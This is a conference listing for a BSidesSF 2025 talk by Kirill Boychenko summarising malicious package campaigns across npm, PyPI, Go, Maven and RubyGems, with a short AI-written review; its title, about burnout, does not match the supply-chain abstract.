Slaying the Dragons: A Security Professional's Guide to Burnout and Resilience
Kirill Boychenko
BSidesSF 2025 — Here Be Dragons · Day 2 · Main
Modern software applications are 70–90% open-source by composition, making package ecosystems an irresistible attack surface. Kirill Boychenko, senior threat intelligence analyst at Socket, walked through real malicious campaigns targeting npm, PyPI, Go, Java/Maven, and RubyGems — demonstrating how attackers combine typosquatting, obfuscation, AI-assisted code generation, multi-stage payloads, and legitimate services like Gmail and Discord to compromise developers and drain crypto wallets. The defense requires automated, behavioral scanning at scale — manual review of millions of packages is not a viable option. ---
AI review
Boychenko brings receipts: real campaigns, named threat actors, specific technical techniques across five ecosystems, and a concrete answer to the 'what do defenders actually do' question. The Ethereum smart contract C2 and the ChatGPT typosquatting automation are legitimately novel operational details that elevate this above the standard supply chain threat overview.